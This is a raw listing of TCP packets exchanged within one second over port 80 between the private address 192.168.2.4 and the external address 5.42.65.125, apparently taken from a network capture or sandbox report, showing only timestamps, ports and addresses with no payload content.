Dec 27, 2023 18:12:24.367827892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.367841005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.367858887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.367870092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.367886066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.367923975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.368845940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.368859053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.368870974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.368885994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.368896961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.368905067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.368930101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.369729042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.369740963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.369776964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.369782925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.369818926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.381306887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.381320000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.381330013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.381340981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.381361961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.381393909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.381705999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.381717920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.381728888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.381755114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.381755114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.381767988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.381795883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.383625031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.383637905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.383671045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.383733034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.383744955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.383768082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.383790016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.384955883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.384967089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.384977102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.384987116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.385000944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.385029078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.386451960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.386465073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.386490107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.386511087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.386517048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.386523008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.386559963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.387162924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.387176037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.387186050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.387214899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.387224913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.387234926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.388108015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.388120890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.388148069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.388159990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.388159990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.388185978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.388211012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.391520023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.391535044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.391546011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.391556978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.391582966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.391616106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.392378092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.392390966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.392401934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.392411947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.392441988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.392457962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.392761946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.392774105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.392785072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.392795086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.392798901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.392817974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.392842054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.393635988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.393647909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.393657923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.393668890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.393692970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.393728971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.394449949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.394463062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.394501925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.394512892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.394525051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.394547939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.394573927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.396213055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.396265030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.396308899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.397444010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.397456884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.397466898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.397478104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.397480965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.397511959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.397870064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.397882938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.397893906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.397902966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.397924900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.397941113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.400193930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.400235891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.400252104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.400264978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.400275946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.400285959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.400305033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.400319099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.400537968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.400549889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.400574923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.400583029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.400595903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.400604963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.400621891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.400638103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.401958942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.401972055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.402004957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.402017117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.402029037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.402054071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.402076006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.402403116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.402441978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.402460098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.402472019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.402482033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.402493954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.402518034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.403285980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.403311968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.403323889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.403323889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.403333902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.403354883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.403381109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.404108047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.404119968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.404130936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.404140949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.404149055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.404165030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.404196978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.404926062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.404978037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.405040026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.405051947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.405071974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.405081987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.405117989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.405776978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.405788898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.405801058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.405812025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.405812979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.405838013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.405868053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.407036066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.407048941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.407058954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.407069921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.407095909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.407130957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.407414913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.407427073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.407458067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.407473087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.407485008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.407507896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.407532930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.408308983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.408343077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.408380985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.408730984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.408771038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.408783913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.408797026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.408807993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.408823967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.408838034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.410012960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.410053015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.410057068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.410074949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.410088062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.410104036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.410130978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.410418034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.410455942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.410466909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.410469055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.410480022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.410497904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.410526991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.411284924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.411297083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.411336899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.411339045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.411351919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.411375046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.411406994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.412372112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.412384987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.412395954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.412405968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.412432909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.412465096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.413006067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.413017988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.413028002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.413038969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.413058043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.413086891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.413820982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.413845062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.413856030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.413883924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.413888931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.413901091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.413927078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.413940907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.414613962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.414625883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.414664030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.414699078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.414736032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.414745092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.414783955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.415549994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.415563107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.415589094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.415602922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.415606976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.415616035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.415648937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.416394949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.416408062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.416428089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.416455984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.416492939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.416505098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.416541100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.417176008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.417188883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.417215109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.417222977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.417236090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.417243004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.417256117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.417273998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.418026924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.418040037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.418054104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.418062925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.418078899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.418086052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.418093920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.418119907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.418814898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.418844938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.418878078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.419286966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.419300079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.419310093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.419321060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.419326067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.419351101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.419374943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.420021057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.420033932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.420066118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.420073032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.420078993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.420105934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.420130014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.420922041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.420936108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.420945883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.420957088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.420969009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.420995951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.421715021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.421732903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.421747923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.421777010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.421797037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.421808958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.421839952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.422627926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.422667027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.422714949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.422727108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.422738075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.422754049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.422770977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.423348904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.423378944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.423408985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.423418045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.423420906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.423443079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.423465014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.424693108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.424705982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.424711943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.424726963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.424738884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.424766064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.431036949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.431086063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.431098938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.431113958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.431127071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.431143045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.438565969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.438595057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.438606977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.438617945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.438628912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.438641071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.438657999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.438666105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.438682079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.438719034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.438728094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.438765049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.438930035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.438941956 CET	80	49738	5.42.65.125	192.168.2.4
